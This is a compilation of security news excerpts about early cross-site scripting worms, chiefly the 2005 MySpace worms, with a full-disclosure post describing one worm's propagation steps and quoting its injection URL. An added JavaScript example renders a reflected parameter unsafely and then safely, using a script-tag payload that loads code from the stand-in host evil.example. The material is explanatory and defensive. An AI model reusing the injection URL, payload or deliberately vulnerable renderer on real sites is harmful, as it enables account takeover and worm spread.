XSS Virus Whitepaper
Posted by jericho
http://www.securiteam.com/securityreviews/6H00D0KEAY.html http://www.bindshell.net/papers/xssv.html
SUMMARY
The following paper explores the new threat of cross-site scripting (XSS) viruses. To date, cross-site scripting has never been utilised to generate viruses. These viruses are a new species which are platform independent and not affected by common firewall configurations. XSS viruses could have a significant impact for Internet continuity, including distributed denial of service (DDoS) attacks, SPAM and dissemination of browser exploits. This is particularly relevant with the increasing sophistication of web browsers and the growing popularity of web based applications such as Wikis and Blogs.
[..]

Cross-Site Scripting Worm Hits MySpace By Nate Mook, BetaNews October 13, 2005, 6:28 PM http://www.betanews.com/article/CrossSiteScriptingWormHitsMySpace/1129232391
With the advent of social networking sites, becoming more popular is as easy as crafting a few lines of JavaScript code, it seems.
One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, “Samy” had amassed over 1 million friends on the popular online community.
How did Samy transcend his humble beginnings of only 73 friends to become a veritable global celebrity? The answer is a combination of XSS tricks and lax security in certain Web browsers.
[..]
By Andrew Orlowski in San Francisco Published Monday 17th October 2005 19:46 GMT http://www.theregister.co.uk/2005/10/17/web20wormknocksoutmyspaces/
It’s been a rough weekend for Tomorrow’s People. A JavaScript exploit that has been called the first “Web 2.0 worm” knocked out MySpace.com - and the $500m-valued website, recently acquired by Rupert Murdoch’s News Corp - was still struggling to get back on its feet two days later.
The cunning JavaScript exploit added a million users as “friends”, forcing the site offline. Service was restored on Friday but two days later the site was still struggling with the consequences, serving pages at a glacial pace.
[..]
A new MySpace worm is currently spreading, and thus far I have a good idea (I think) of how it's spreading. Here it goes:
1) The attack starts with an embedded .swf Flash file.
2) The Flash file uses ActionScript to send a simple GET request to an UNSANITIZED (whew, embarrassing on MySpace's part) variable by the name of TheName.
3) The GET request in #2 then loads a remote .js script.
4) The remote .js script then uses XML HTTP send commands to execute the malicious part of the worm: changing first, last, and display names to "g0dOfTheN00se" and injecting the malicious .swf file into several parts of the profile, including television.
The malicious XSS attack, without the .swf embedded attack and everything else is: http://myspace.com/PROFILE/COMMENTS.CFM?FriendID=6221&getComments.recordcount=1&TotalComments=1&MyUserID=6221&TheName=XSS
The malicious .swf file is actually being killed off by free host providers pretty quickly, and so are the sites hosting the .js file.
Also, to top it off, a special message is left by the author of the worm; it goes as follows: "MySpace Aids Is Back Bitch. Merry Christmas From ..!.g0dOfTheNoose.!.. ."
After the message, he/she embeds the URL to the malicious .swf Flash file yet again; he's a persistent little person. :)
http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0870.html
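The reflection of an unsanitized query parameter that the post above describes, shown beside the output-encoding fix, as an added example that is not code from the Full-Disclosure post or from MySpace. The template markup, the hostname evil.example and the script-tag payload are constructed stand-ins; the real COMMENTS.CFM markup is not on the page, only the parameter names in the quoted URL.

```javascript
// Added example: a constructed stand-in for a comments page that reflects the
// TheName query parameter. MySpace's real template is not known; only the
// parameter names in the quoted URL are taken from the post.
const BASE = "http://myspace.com/PROFILE/COMMENTS.CFM";

// Parse the query string of a request URL into a plain object.
function parseQuery(url) {
  const params = {};
  for (const [k, v] of new URL(url).searchParams) params[k] = v;
  return params;
}

// Vulnerable rendering: the parameter is concatenated straight into HTML, so any
// markup carried in TheName becomes part of the page and runs in the viewer's
// browser (the condition the post calls "UNSANITIZED").
function renderUnsafe(params) {
  return `<h3>Comments for ${params.TheName}</h3>` +
         `<div id="comments" data-user="${params.MyUserID}"></div>`;
}

// Minimal HTML entity encoder for text content and double-quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened rendering: every untrusted value is encoded for the context it lands in.
function renderSafe(params) {
  return `<h3>Comments for ${escapeHtml(params.TheName)}</h3>` +
         `<div id="comments" data-user="${escapeHtml(params.MyUserID)}"></div>`;
}

// True if the rendered output still contains a live <script> element,
// i.e. if the injection survived rendering.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed test request: the parameters of the URL quoted in the post, with
// TheName carrying a remote-script tag instead of the literal "XSS". The host
// evil.example is a placeholder, not a real worm host.
const SAMPLE_URL = BASE +
  "?FriendID=6221&getComments.recordcount=1&TotalComments=1&MyUserID=6221&TheName=" +
  encodeURIComponent('<script src="http://evil.example/w.js"></script>');

// Render the same request both ways so the difference is visible side by side.
function demo() {
  const p = parseQuery(SAMPLE_URL);
  return { unsafe: renderUnsafe(p), safe: renderSafe(p) };
}

console.log(demo());
```

The hardened version only changes where encoding happens, not what the page displays: a legitimate name such as O'Brien still renders correctly, while a value containing angle brackets is shown as text rather than parsed as markup. Output encoding is the fix for this class of bug; a remote script loaded through a reflected parameter is exactly the second hop the post describes.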
The MySpace case is not the first in which self-propagating code has been created for a specific environment such as social networking. In August this year a proof-of-concept appeared on the Latvian Internet which was able to send itself to users of the site Draugiem.lv (an analogue of MySpace.com). [..]